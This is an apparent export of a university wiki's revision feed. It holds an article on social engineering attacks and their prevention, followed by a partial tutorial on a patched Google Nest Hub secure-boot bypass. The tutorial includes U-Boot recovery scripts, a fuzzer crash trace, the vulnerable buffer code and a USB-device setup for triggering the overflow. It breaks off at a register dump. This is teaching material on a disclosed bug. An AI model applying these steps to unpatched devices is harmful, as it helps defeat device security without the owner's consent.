Since detecting malware is getting more difficult everytime you should start using certain tools to help you secure you environment. To protect against more advanced attacks, it is recommended that companies use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS), which can detect and respond to attacks in real-time. In addition to a firewall, companies can also use Virtual Private Networks (VPNs) to secure their internet connection. Anti-phishing tools can help to block and blacklist phishing websites, and companies can also consider using honeypot emails as a way to lure and track attackers. It is also important to implement physical security measures, such as properly securing hardware and following guidelines for physical access to facilities. These tools will help you to detect unwanted programs and helps you safeing your data externally. &lt;br /&gt;
&lt;br /&gt;
* Anti Virus Software: [https://www.malwarebytes.com/ Malwarebytes]&lt;br /&gt;
* Browser Anti-Ad/Spam Plugin: [https://ublockorigin.com/ uBlock Origin]&lt;br /&gt;
* Check E-Mail periodically: [https://haveibeenpwned.com/ HaveIBeenPwned]&lt;br /&gt;
* Safe File externally: [https://nextcloud.com/ Nextcloud]&lt;br /&gt;
* Check Programs: [https://www.virustotal.com/ Virustotal]&lt;br /&gt;
* Password Manager: [https://keepassxc.org/ KeepassXC]&lt;br /&gt;
&lt;br /&gt;
== Social Media Intelligence ==&lt;br /&gt;
&lt;br /&gt;
Social media intelligence (SOCMINT) is a process that involves gathering and analyzing data from social media platforms in order to inform business decisions. This type of intelligence can be used to track brand mentions and sentiment, monitor competitors, and identify emerging trends or opportunities for engagement.&lt;br /&gt;
&lt;br /&gt;
By collecting and analyzing social media data, companies can gain valuable insights into the perceptions and behaviors of their customers and target audience. This can inform marketing strategies, customer service efforts, and product development. For example, a company might use social media intelligence to identify common customer pain points and develop solutions to address them, or to identify influencers to partner with in order to promote their brand.&lt;br /&gt;
&lt;br /&gt;
There are a number of tools and platforms available to help companies automate the process of gathering and analyzing social media data. These tools often include features such as keyword tracking, sentiment analysis, and competitor analysis.&lt;br /&gt;
&lt;br /&gt;
Overall, social media intelligence can be an important part of a company&#039;s market research and customer insights efforts, helping them to better understand and connect with their audience on social media. It can also be a useful way for companies to stay up-to-date on industry developments and emerging trends, and to identify opportunities for growth and innovation.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.sciencedirect.com/science/article/abs/pii/S2214212614001343?via%3Dihub&lt;br /&gt;
* https://link.springer.com/chapter/10.1007/978-3-642-22424-9_4&lt;br /&gt;
* https://www.mdpi.com/1999-5903/11/4/89&lt;br /&gt;
* https://www.researchgate.net/profile/Hugo-Barbosa/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY/links/599c43430f7e9b892bafc0df/SOCIAL-ENGINEERING-AND-CYBER-SECURITY.pdf&lt;br /&gt;
* https://cybernews.com/cyber-war/influencing-anonymous-experiment/&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14540</id>
		<title>Social Engineering</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Social_Engineering&amp;diff=14540"/>
		<updated>2024-03-04T18:28:54Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: checked references, some typo fixes, added picture of attack cycle, added some more information and references&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
This documentation contains information of what Social Engineering is, how it is getting used and how to prevent or mitigate some of those attacks. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
In order to execute a social engineering attack you need to understand the basis of social engineering described below. There are also tools to understand and execute these attacks on a practical level. There are many pre-defined attacks which show how easy it is to perform such attacks. You can read more about that in [[Social Engineering Toolkit]]&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
Social engineering is a technique that involves using human interaction to gather information or influence a person to act in a certain way. It can involve spying on someone&#039;s personal life in order to achieve a specific goal, such as manipulating elections, obtaining information, or stealing money. The goal of social engineering is to guide a person towards a particular outcome, often by manipulating their thoughts or actions.&lt;br /&gt;
&lt;br /&gt;
=== Phases ===&lt;br /&gt;
In Social Engineering there are a few necessary steps to complete an attack and gain the information you are after. Kevin Mitnick has divided the process into 4 steps with are mainly: &#039;&#039;&#039;Information Gathering&#039;&#039;&#039;, &#039;&#039;&#039;Hook Relationship&#039;&#039;&#039;, &#039;&#039;&#039;Exploitation and Execution&#039;&#039;&#039; and &#039;&#039;&#039;End without leaving a trace&#039;&#039;&#039;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:File:01_mitnicks_attack_circle.png|thumb|none|300px|Source: Mouton, Social&lt;br /&gt;
engineering attack framework]]&lt;br /&gt;
&lt;br /&gt;
==== Information Gathering ====&lt;br /&gt;
Information gathering involves collecting as much information as possible about a potential victim in order to identify possible attack vectors. This may include identifying personal details, interests, or vulnerabilities that can be exploited. This information can be gathered through various means, such as social media, public records, or by directly interacting with the victim.&lt;br /&gt;
&lt;br /&gt;
==== Hook Relationship ====&lt;br /&gt;
In order to build a &amp;quot;hook relationship&amp;quot; with the victim, the attacker will often try to present themselves as trustworthy in order to gain the victim&#039;s confidence and cooperation. This may involve pretending to be someone the victim knows, such as a colleague or friend, or posing as an authority figure in order to gain the victim&#039;s trust.&lt;br /&gt;
&lt;br /&gt;
==== Exploitation and Execution ====&lt;br /&gt;
The exploitation and execution phase involves manipulating the victim in order to persuade them to take certain actions or disclose information that the attacker is seeking. This may involve using psychological manipulation or other tactics to influence the victim&#039;s behavior. The attacker may use a variety of tactics, such as flattery, fear, or pressure, in order to persuade the victim to comply with their requests.&lt;br /&gt;
&lt;br /&gt;
==== End without leaving a trace ====&lt;br /&gt;
Once the attacker has achieved their goal, they will often try to cover their tracks and end the attack without leaving any evidence behind. This may involve deleting any records of the attack or disguising their involvement in order to avoid detection. In order to avoid being caught, the attacker may also take steps to destroy any evidence of the attack, such as wiping clean any devices or servers that were used in the attack.&lt;br /&gt;
&lt;br /&gt;
== Attacks ==&lt;br /&gt;
This part contains the most common and basic attacks used today. Nearly everyone should have seen such an attack in practice, either by e.g. receiving a pishing email or getting a warning that pishing emails are circulating with an example. If you have not, just check you Spam or Junk folder in you mailbox you will probably find one in there. &lt;br /&gt;
&lt;br /&gt;
=== Phishing ===&lt;br /&gt;
Phishing Attacks are one of the most common attacks. They are pretty simple and based on for example a real E-Mail that is being copied and used to get user data with links redirecting to a wrong website. This website looks than pretty similar to the original and if you do not look close enough you sometimes do not even realize that it is fake. The goal of this attack is in general to steal password from accounts and then try to steal money in any way possible. There are different types of phishing:&lt;br /&gt;
* Spear phishing: Are attacks on specific people or groups, for this you need to know about the person/company beforehand. Since it is very personal, it is also often very successful in contrast to other Social Engineering approaches. &lt;br /&gt;
* Whaling: Similar to spear-phishing, except that high-profile individuals are targeted.&lt;br /&gt;
* Vishing:These phishing attacks are carried out over the phone.&lt;br /&gt;
* Smishing: The attacks are carried out over text messages.&lt;br /&gt;
* Interactive voice-response phishing: Interactive voice response system is used. &lt;br /&gt;
* Business email compromise phishing: : It is similar to whaling, the attacker wants access to business mails and then sends legitimate looking business mails to get ”normal” employees to click some link or something.&lt;br /&gt;
&lt;br /&gt;
=== Pretexting ===&lt;br /&gt;
This attack is similar to Phishing but the goal of this attack is to make you believe that you are being contacted by someone close or authoritative. These messages could lead you to send personal information to the attacker. If done right and other conversation were being caputred before and the phone number or E-Mail got spoofed you sometimes would not even realize that it is a fake.  &lt;br /&gt;
&lt;br /&gt;
=== Tailgaiting ===&lt;br /&gt;
Tailgaiting is an attack that requires physical access to a secure building. This is achieved by following people through doors or opening you the door by thinking you lost your access card. When done right you get access to a certain level where you could install malware on others PCs. Another ways would be to ask someone for their phone to make a call and then install malware when they are not watching. &lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
[[Ransomware]] is a type of malicious software that encrypts a victim&#039;s personal data and demands a ransom from the victim to restore access to the data. These attacks have been increasing in popularity and are becoming more and more difficult to stop. Some well-known examples of [[Ransomware]] include WannaCry (2017) and Locky (2016). One of the dangers of ransomware is that even if the victim pays the ransom, there is no guarantee that they will actually get their data back.&lt;br /&gt;
&lt;br /&gt;
=== Dumpster Diving ===&lt;br /&gt;
This technique is as the name already tells used to get information out of the trash of others. A letter with sensitive infomation e.g. bank, creditcard or hard drives can contain a lot of data that can be used against you if not disposed properly. A good tip would be throw away pieces of information in different trash cans for example when on the way to work. &lt;br /&gt;
&lt;br /&gt;
=== Pop-Up Window ===&lt;br /&gt;
Pop-Up Windows are often used to scare non enlightened people to get tricked by a simple window mostly in a browser. This scam either wants you to redeem the jackpot you just won or tell you that you computer is infected and you should call the attacker to infect you with malware. Most of the times these windows are hard to close and are pretty loud to intimiated the victim. &lt;br /&gt;
&lt;br /&gt;
=== Pharming ===&lt;br /&gt;
This approach is similar to the goal of Pishing but is done quite differently. The task is to lure the vicitm on to a similar looking website e.g. bank, insurance, ... but it is not done with sending you fake links but rather hacking the DNS Server and redirecting you instantly without you even knowing. If the website is done very well your data is being apprehend and afterwards you are getting redirect onto your real bank account without you ever knowing. &lt;br /&gt;
&lt;br /&gt;
=== Baiting/USB Drop ===&lt;br /&gt;
Another bait attack involves the use of dropped USB drives. The attacker will leave a USB drive in a public place, such as a parking lot or lobby, with a label or message that suggests it contains something interesting or valuable. When someone picks up the drive and plugs it into their computer, they may be exposing their system to malware or ransomware.&lt;br /&gt;
&lt;br /&gt;
=== Eavesdropping ===&lt;br /&gt;
Eavesdropping is the act of secretly listening to the private conversations of others without their knowledge. It can be done in a variety of ways, such as through the use of hidden microphones, wiretapping, or simply by listening in on a conversation that is happening nearby. Eavesdropping can be a serious invasion of privacy and is often illegal, particularly if it is done for malicious purposes such as to gather personal or sensitive information. In the digital age, eavesdropping can also be done remotely through the use of malware or other cyber threats that allow an attacker to access and monitor the conversations of their victims.&lt;br /&gt;
&lt;br /&gt;
=== Reverse Social Engineering ===&lt;br /&gt;
One common technique used in reverse social engineering attacks is for the attacker to pretend to be a good guy or authority figure in order to gain the victim&#039;s trust. For example, the attacker might pretend to be a technical support representative and ask the victim for their login credentials in order to &amp;quot;fix&amp;quot; a problem with their computer. Or, the attacker might pose as a law enforcement officer and request that the victim provide sensitive information in order to &amp;quot;assist with an investigation.&amp;quot; In these cases, the victim may feel pressure to comply with the request, believing that they are helping to solve a problem or protect against a threat.&lt;br /&gt;
&lt;br /&gt;
=== Impersonating ===&lt;br /&gt;
Impersonating is the act of pretending to be someone else, either in person or online, in order to deceive others. This can be done for a variety of reasons, such as to gain access to sensitive information or resources, to evade detection or consequences, or to commit a crime. In the digital world, impersonation is often done through the use of fake profiles or websites that mimic legitimate ones in order to trick people into divulging personal information or money. In person, impersonation can be more complex and may involve the use of props, costumes, and other means of disguising one&#039;s true identity.&lt;br /&gt;
&lt;br /&gt;
== Prevention ==&lt;br /&gt;
As attacks increase and improve it is very hard to defend against those if you do not know how they work and what they do. To prevent or mitigate such attacks you need 3 important informations.&lt;br /&gt;
&lt;br /&gt;
=== Clarify Attacks ===&lt;br /&gt;
The first part help you to understand how and what these attacks are trying to do. If you know what a Pop-Up Window is and you now know that these messages are spam and trying to lure you into a trap you will not fall for it anymore. The best way is know examples of the most common attacks to obtainer awareness againts those social engineering attacks. Since these attacks improve over time you should be up-to-date and you should ask people you trust for help if you do not know how to proceed. &lt;br /&gt;
&lt;br /&gt;
=== Education and Training ===&lt;br /&gt;
To ensure the safety and security of your employees, it is important to provide regular training sessions to keep them informed on best practices and current threats. They should be cautious when receiving phone calls or emails from unknown sources, and verify the identity of the sender before disclosing any confidential information. They should also be wary of suspicious links or attachments, and avoid downloading unknown files. To further protect against potential threats, it is advisable to implement multifactor authentication and regularly update antivirus and antimalware programs. Additionally, it is important to carefully examine the references of any offers or requests for sensitive data.&lt;br /&gt;
&lt;br /&gt;
=== Set Security Standards ===&lt;br /&gt;
You should start setting yourself a certain security standard. This goes from checking certain programs or files you do not know to check links before you click them. If you have a new contact in your mailbox you should double check the sender to know for you sure you are not dealing with a scam artist. You should also never share you PC with other or plug-in strange devices you do not know. An increased awareness about pishing emails from providers would be appreciative to check bills if they are not infected with malware. &lt;br /&gt;
&lt;br /&gt;
=== Implement Security Tools ===&lt;br /&gt;
Since detecting malware is getting more difficult everytime you should start using certain tools to help you secure you environment. To protect against more advanced attacks, it is recommended that companies use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS), which can detect and respond to attacks in real-time. In addition to a firewall, companies can also use Virtual Private Networks (VPNs) to secure their internet connection. Anti-phishing tools can help to block and blacklist phishing websites, and companies can also consider using honeypot emails as a way to lure and track attackers. It is also important to implement physical security measures, such as properly securing hardware and following guidelines for physical access to facilities. These tools will help you to detect unwanted programs and helps you safeing your data externally. &lt;br /&gt;
&lt;br /&gt;
* Anti Virus Software: [https://www.malwarebytes.com/ Malwarebytes]&lt;br /&gt;
* Browser Anti-Ad/Spam Plugin: [https://ublockorigin.com/ uBlock Origin]&lt;br /&gt;
* Check E-Mail periodically: [https://haveibeenpwned.com/ HaveIBeenPwned]&lt;br /&gt;
* Safe File externally: [https://nextcloud.com/ Nextcloud]&lt;br /&gt;
* Check Programs: [https://www.virustotal.com/ Virustotal]&lt;br /&gt;
* Password Manager: [https://keepassxc.org/ KeepassXC]&lt;br /&gt;
&lt;br /&gt;
== Social Media Intelligence ==&lt;br /&gt;
&lt;br /&gt;
Social media intelligence (SOCMINT) is a process that involves gathering and analyzing data from social media platforms in order to inform business decisions. This type of intelligence can be used to track brand mentions and sentiment, monitor competitors, and identify emerging trends or opportunities for engagement.&lt;br /&gt;
&lt;br /&gt;
By collecting and analyzing social media data, companies can gain valuable insights into the perceptions and behaviors of their customers and target audience. This can inform marketing strategies, customer service efforts, and product development. For example, a company might use social media intelligence to identify common customer pain points and develop solutions to address them, or to identify influencers to partner with in order to promote their brand.&lt;br /&gt;
&lt;br /&gt;
There are a number of tools and platforms available to help companies automate the process of gathering and analyzing social media data. These tools often include features such as keyword tracking, sentiment analysis, and competitor analysis.&lt;br /&gt;
&lt;br /&gt;
Overall, social media intelligence can be an important part of a company&#039;s market research and customer insights efforts, helping them to better understand and connect with their audience on social media. It can also be a useful way for companies to stay up-to-date on industry developments and emerging trends, and to identify opportunities for growth and innovation.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.sciencedirect.com/science/article/abs/pii/S2214212614001343?via%3Dihub&lt;br /&gt;
* https://link.springer.com/chapter/10.1007/978-3-642-22424-9_4&lt;br /&gt;
* https://www.mdpi.com/1999-5903/11/4/89&lt;br /&gt;
* https://www.researchgate.net/profile/Hugo-Barbosa/publication/315351300_SOCIAL_ENGINEERING_AND_CYBER_SECURITY/links/599c43430f7e9b892bafc0df/SOCIAL-ENGINEERING-AND-CYBER-SECURITY.pdf&lt;br /&gt;
* https://cybernews.com/cyber-war/influencing-anonymous-experiment/&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:01_mitnicks_attack_circle.png&amp;diff=14532</id>
		<title>File:01 mitnicks attack circle.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:01_mitnicks_attack_circle.png&amp;diff=14532"/>
		<updated>2024-03-04T17:59:03Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: Kevin Mitnicks Social Engineering Attack Circle&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
Kevin Mitnicks Social Engineering Attack Circle&lt;/div&gt;</summary>
		<author><name>PKraubner</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14376</id>
		<title>(Legacy) USB Vulnerability on Google Nest Hub</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=(Legacy)_USB_Vulnerability_on_Google_Nest_Hub&amp;diff=14376"/>
		<updated>2024-02-13T14:36:30Z</updated>

		<summary type="html">&lt;p&gt;PKraubner: added precise explaination of the bootloader bug exploit&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Disclaimer ==&lt;br /&gt;
&lt;br /&gt;
Article in progress, this is not the final version.&lt;br /&gt;
This tutorial has been patched by Google in December 2021 via OTA-update [update number WIP], now the booting sequence of the Recovery Mode does not work as intended for this exploit to work.&lt;br /&gt;
&lt;br /&gt;
== Background == &lt;br /&gt;
The USB Vulnerability on Google Nest Hub was an possible exploit found out by Frederic Bassé. His report is available at https://fredericb.info/2022/06/breaking-secure-boot-on-google-nest-hub-2nd-gen-to-run-ubuntu.html.&lt;br /&gt;
&lt;br /&gt;
The possible firmware versions of the exploit were the following:&lt;br /&gt;
&lt;br /&gt;
* factory firmware (2020/12) - U-Boot 2019.01-gbfc19012ea-dirty (Dec 11 2020 - 04:19:32 )&lt;br /&gt;
* factory firmware (2022/01, 2022/02) - U-Boot 2019.01-g9542d3593d-dirty (May 21 2021 - 20:52:42 )&lt;br /&gt;
&lt;br /&gt;
As stated by Frederic Bassé, the vulnerability shouldn&#039;t even exist since it&#039;s already been twice fixed upstream (means the developers or maintainers at the source have identified and resolved the vulnerability in the software&#039;s codebase, hence the fix is integrated into the main version of the software). The lack of CVE may explain why it hasn&#039;t been propagated downstream. (means the fix has been disseminated to the various versions or distributions that use the affected code. This can involve updating software packages, releasing new versions, or providing patches.)&lt;br /&gt;
&lt;br /&gt;
Beware that the Google Nest Hub will be receiving incoming upgrades for its firmware as soon as it receives a WLAN Signal (Firmware-Update-Over-The-Air, the Update is sent from the Google Servers wireless to the end device) and downgrading the firmware afterwards is not easily done.&lt;br /&gt;
&lt;br /&gt;
In conclusion you will need a device with a manufacturing date listed above and you must not connect it to WiFi or else the firmware version will be upgraded.&lt;br /&gt;
&lt;br /&gt;
The exploit essentially broke down in the following procedures:&lt;br /&gt;
&lt;br /&gt;
=== Hardware exploration ===&lt;br /&gt;
As described on Electronics360 (Link in References), the Google Nest Hub is based on the SoC Amlogic S905D3G. Additionally there is a hidden Micro USB Port, which is used for debugging and normally not to be used by customers. This Micro USB Port is together with the power supply separated from the mainboard on an extra module. The two modules are connected with a 16-pin Flexible Flat Cable. Since the Micro USB 2.0 only requires 3 pins (the port has no power supply) and the power supply itself 11 pins, two pins are remaining. Measuring the voltage on these pins showed that one of these Pins is constant near-0V and the other fluctuates between 0 and 3.3V. This is suitable for an UART port. Via a debugging board with the right FFC connector (16-pin, 0.5mm pitch) one is able to gain access to UART, USB and the power supply.&lt;br /&gt;
&lt;br /&gt;
Via the UART port we can obtain the logs being sent during booting process by using an USB-to-Serial Adapter. Bootloader and U-Boot logs can be seen. When pressing both volume buttons, the Nest is trying to load a file named recovery.img from an external USB flash drive.&lt;br /&gt;
&lt;br /&gt;
=== Software exploration ===&lt;br /&gt;
Said USB recovery mechanism is implemented in U-Boot, which is open source.&lt;br /&gt;
By grepping the recovery.img, a function named recovery_from_udisk is found:&lt;br /&gt;
&lt;br /&gt;
 &amp;quot;recovery_from_udisk=&amp;quot; \&lt;br /&gt;
      &amp;quot;while true ;do &amp;quot; \&lt;br /&gt;
             &amp;quot;usb reset; &amp;quot; \&lt;br /&gt;
             &amp;quot;if fatload usb 0 ${loadaddr} recovery.img; then &amp;quot;\&lt;br /&gt;
                    &amp;quot;bootm ${loadaddr};&amp;quot; \&lt;br /&gt;
             &amp;quot;fi;&amp;quot; \&lt;br /&gt;
      &amp;quot;done;&amp;quot; \&lt;br /&gt;
      &amp;quot;\0&amp;quot; \&lt;br /&gt;
&lt;br /&gt;
Furthermore the function bootm, shown in the following lines, shows that recovery_from_udisk is activated when both volume buttons (GPIOZ_5 and GPIOZ_6) are being pressed.&lt;br /&gt;
&lt;br /&gt;
 &amp;quot;upgrade_key=&amp;quot; \&lt;br /&gt;
      &amp;quot;if gpio input GPIOZ_5; then &amp;quot; \&lt;br /&gt;
             &amp;quot;echo detect VOL_UP pressed;&amp;quot; \&lt;br /&gt;
             &amp;quot;if gpio input GPIOZ_6; then &amp;quot; \&lt;br /&gt;
                    &amp;quot;echo VOL_DN pressed;&amp;quot; \&lt;br /&gt;
                    &amp;quot;setenv boot_external_image 1;&amp;quot; \&lt;br /&gt;
                    &amp;quot;run recovery_from_udisk;&amp;quot; \&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
The recovery.img is verified by another function, aml_sec_boot_check. This verification needs to be bypassed in order to load a custom OS.&lt;br /&gt;
&lt;br /&gt;
To estimate the attack surface from the USB interface, we can take a look at the call flow triggered by the recovery feature:&lt;br /&gt;
[[File:Uboot-cfg.png|500px|thumb|Uboot call flow diagram]]&lt;br /&gt;
Basically usb reset exposes the USB driver when it performs USB enumeration,&lt;br /&gt;
and fatload exposes several drivers : USB, Mass Storage, DOS partition, FAT filesystem.&lt;br /&gt;
The bootm attack surface is very limited since it starts by calling the signature verification routine aml_sec_boot_check, which cannot be reviewed because it&#039;s implemented in TrustZone (no source code or binary available at this moment)&lt;br /&gt;
&lt;br /&gt;
It is known that U-Boot implements a sandbox architecture that allows it to run as a Linux user-space application. This feature is a convenient starting point to build a fuzzer for U-Boot code. Fuzz testing, or fuzzing, is a software testing technique where automated tools input random or unexpected data into a program to discover vulnerabilities, bugs, or unexpected behavior. A fuzzing harness that injects data in blk_dread (function that reads data from a block device), and triggers execution by calling fat_read_file shows that the USB Mass Storage driver sets multiple parameters in structure blk_desc that describe the detected block device in initialized state.&lt;br /&gt;
&lt;br /&gt;
One of these parameters is the block size (blk_desc.blksz) of the block device (which is an USB flash drive in our case). This value is obtained from the block device by sending command READ CAPACITY, which means attacker controls it.&lt;br /&gt;
&lt;br /&gt;
When tinkering with the block size, the following crash message could be detected:&lt;br /&gt;
&lt;br /&gt;
 $ ./fuzz&lt;br /&gt;
 INFO: Seed: 473398954&lt;br /&gt;
 INFO: Loaded 1 modules   (1402 inline 8-bit counters): 1402 [0x5aa0c0, 0x5aa63a), &lt;br /&gt;
 INFO: Loaded 1 PC tables (1402 PCs): 1402 [0x57ada0,0x580540), &lt;br /&gt;
 =================================================================&lt;br /&gt;
 ==5892==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe6db4bb3f at pc 0x0000004f16af bp 0x7ffe6db4b790 sp 0x7ffe6db4af40&lt;br /&gt;
 WRITE of size 32768 at 0x7ffe6db4bb3f thread T0&lt;br /&gt;
     #0 0x4f16ae in __asan_memset (/u-boot-elaine/fuzzer/fuzz+0x4f16ae)&lt;br /&gt;
     #1 0x55a8cf in blk_dread /u-boot-elaine/fuzzer/blk.c:153:13&lt;br /&gt;
     #2 0x5284b1 in part_test_dos /u-boot-elaine/disk/part_dos.c:96:6&lt;br /&gt;
     #3 0x521f52 in part_init /u-boot-elaine/disk/part.c:242:9&lt;br /&gt;
     #4 0x55b494 in usb_stor_probe_device /u-boot-elaine/fuzzer/usb_storage.c:41:5&lt;br /&gt;
     #5 0x55b648 in LLVMFuzzerTestOneInput /u-boot-elaine/fuzzer/fuzz.c:42:5&lt;br /&gt;
     #6 0x42ee1a in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/u-boot-elaine/fuzzer/fuzz+0x42ee1a)&lt;br /&gt;
     #7 0x43052a in fuzzer::Fuzzer::ReadAndExecuteSeedCorpora(std::vector&amp;lt;std::__cxx11::basic_string&amp;lt;char, std::char_traits&amp;lt;char&amp;gt;, std::allocator&amp;lt;char&amp;gt; &amp;gt;, fuzzer::fuzzer_allocator&amp;lt;std::__cxx11::basic_string&amp;lt;char, std::char_traits&amp;lt;char&amp;gt;, std::allocator&amp;lt;char&amp;gt; &amp;gt; &amp;gt; &amp;gt; const&amp;amp;) (/u-boot-elaine/fuzzer/fuzz+0x43052a)&lt;br /&gt;
     #8 0x430bf5 in fuzzer::Fuzzer::Loop(std::vector&amp;lt;std::__cxx11::basic_string&amp;lt;char, std::char_traits&amp;lt;char&amp;gt;, std::allocator&amp;lt;char&amp;gt; &amp;gt;, fuzzer::fuzzer_allocator&amp;lt;std::__cxx11::basic_string&amp;lt;char, std::char_traits&amp;lt;char&amp;gt;, std::allocator&amp;lt;char&amp;gt; &amp;gt; &amp;gt; &amp;gt; const&amp;amp;) (/u-boot-elaine/fuzzer/fuzz+0x430bf5)&lt;br /&gt;
     #9 0x426e00 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/u-boot-elaine/fuzzer/fuzz+0x426e00)&lt;br /&gt;
     #10 0x44a412 in main (/u-boot-elaine/fuzzer/fuzz+0x44a412)&lt;br /&gt;
     #11 0x7b733912f09a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a)&lt;br /&gt;
     #12 0x420919 in _start (/u-boot-elaine/fuzzer/fuzz+0x420919)&lt;br /&gt;
  &lt;br /&gt;
 Address 0x7ffe6db4bb3f is located in stack of thread T0 at offset 607 in frame&lt;br /&gt;
     #0 0x5282ff in part_test_dos /u-boot-elaine/disk/part_dos.c:90&lt;br /&gt;
  &lt;br /&gt;
   This frame has 1 object(s):&lt;br /&gt;
     [32, 607) &#039;__mbr&#039; (line 92) &amp;lt;== Memory access at offset 607 overflows this variable&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
AddressSanitizer detected a stack buffer overflow in part_test_dos. This function is called to detect a DOS partition table when an USB Mass Storage device is connected.&lt;br /&gt;
&lt;br /&gt;
It is interesting to note that - while the crash occurs in DOS partition layer - the invalid size at the origin of the crash is set by the USB Mass Storage layer. This suggests that it is unlikely to find this bug if layers are fuzzed independently.&lt;br /&gt;
&lt;br /&gt;
The crash is caused by a simple bug in function part_test_dos :&lt;br /&gt;
&lt;br /&gt;
 static int part_test_dos(struct blk_desc *dev_desc)&lt;br /&gt;
 {&lt;br /&gt;
 [...]&lt;br /&gt;
 (1)    ALLOC_CACHE_ALIGN_BUFFER(legacy_mbr, mbr, 1);&lt;br /&gt;
 &lt;br /&gt;
 (2)    if (blk_dread(dev_desc, 0, 1, (ulong *)mbr) != 1)&lt;br /&gt;
&lt;br /&gt;
The Buffer mbr of 512 bytes (sizeof(legacy_mbr)) is allocated on the stack.&lt;br /&gt;
The Function blk_dread reads 1 block at address 0 from block device dev_desc and writes data to buffer mbr.&lt;br /&gt;
&lt;br /&gt;
If the block size (dev_desc-&amp;gt;blksz) is larger than 512, function blk_dread overflows the buffer mbr.&lt;br /&gt;
&lt;br /&gt;
The block size can be controlled by attacker. Generally most USB flash drives have a block size of 512 bytes, and it cannot be customized easily. So it is required to build one, for example with an Raspberry.&lt;br /&gt;
&lt;br /&gt;
=== Building exploitation device ===&lt;br /&gt;
&lt;br /&gt;
A Raspberry Pico is being used for this project due to being cheap and being supported by TinyUSB (open source cross-platform USBHost-Device stack). TinyUSB enables one to build a customizable flash drive out of the Raspberry Pico.&lt;br /&gt;
&lt;br /&gt;
==== Is the device vulnerable? ====&lt;br /&gt;
In order to check if the Nest is vulnerable to the bug, the block size is being changed to 1024 instead of the maximal supported 512 bytes.&lt;br /&gt;
&lt;br /&gt;
When the Pico is connected to the Nest USB-Port, the UART log shows that the Pico is being detected as Mass Storage with 1024-byte logical blocks:&lt;br /&gt;
&lt;br /&gt;
 usb 1-2: New USB device found, idVendor=cafe, idProduct=4003, bcdDevice= 1.00&lt;br /&gt;
 usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3&lt;br /&gt;
 usb 1-2: Product: TinyUSB Device&lt;br /&gt;
 usb 1-2: Manufacturer: TinyUSB&lt;br /&gt;
 usb 1-2: SerialNumber: 123456789012&lt;br /&gt;
 usb-storage 1-2:1.0: USB Mass Storage device detected&lt;br /&gt;
 scsi host0: usb-storage 1-2:1.0&lt;br /&gt;
 scsi host0: scsi scan: INQUIRY result too short (5), using 36&lt;br /&gt;
 scsi 0:0:0:0: Direct-Access     TinyUSB  Mass Storage     1.0  PQ: 0 ANSI: 2&lt;br /&gt;
 sd 0:0:0:0: Attached scsi generic sg0 type 0&lt;br /&gt;
 sd 0:0:0:0: [sda] 16 1024-byte logical blocks: (16.4 kB/16.0 KiB)&lt;br /&gt;
 sd 0:0:0:0: [sda] Write Protect is off&lt;br /&gt;
 sd 0:0:0:0: [sda] Mode Sense: 03 00 00 00&lt;br /&gt;
 sd 0:0:0:0: [sda] No Caching mode page found&lt;br /&gt;
 sd 0:0:0:0: [sda] Assuming drive cache: write through&lt;br /&gt;
 sda:&lt;br /&gt;
 sd 0:0:0:0: [sda] Attached SCSI removable disk&lt;br /&gt;
&lt;br /&gt;
When booting the Nest and enabling the recovery mode by pressing both volume buttons, the Pico now is causing an exception. The UART log additionally provides us with some registers:&lt;br /&gt;
&lt;br /&gt;
 &amp;quot;Synchronous Abort&amp;quot; handler, esr 0x02000000&lt;br /&gt;
 elr: ffffffff8110e000 lr : ffffffff8110e000 (reloc)&lt;br /&gt;
 elr: 0000000000000000 lr : 0000000000000000&lt;br /&gt;
 x0 : 0000000000000002 x1 : 0000000000000000&lt;br /&gt;
 x2 : 0000000000000000 x3 : 0000000000000000&lt;br /&gt;
 x4 : 000000007bed5b00 x5 : fffffffffffffff8&lt;br /&gt;
 x6 : 0000000000000000 x7 : 0000000000000000&lt;br /&gt;
 x8 : 0000000000000001 x9 : 0000000000000008&lt;br /&gt;
 x10: 000000007c0021b0 x11: 000000007c009b80&lt;br /&gt;
 x12: 0000000000000001 x13: 0000000000000001&lt;br /&gt;
 x14: 000000007bed5c4c x15: 00000000ffffffff&lt;br /&gt;
 x16: 0000000000004060 x17: 0000000000000084&lt;br /&gt;
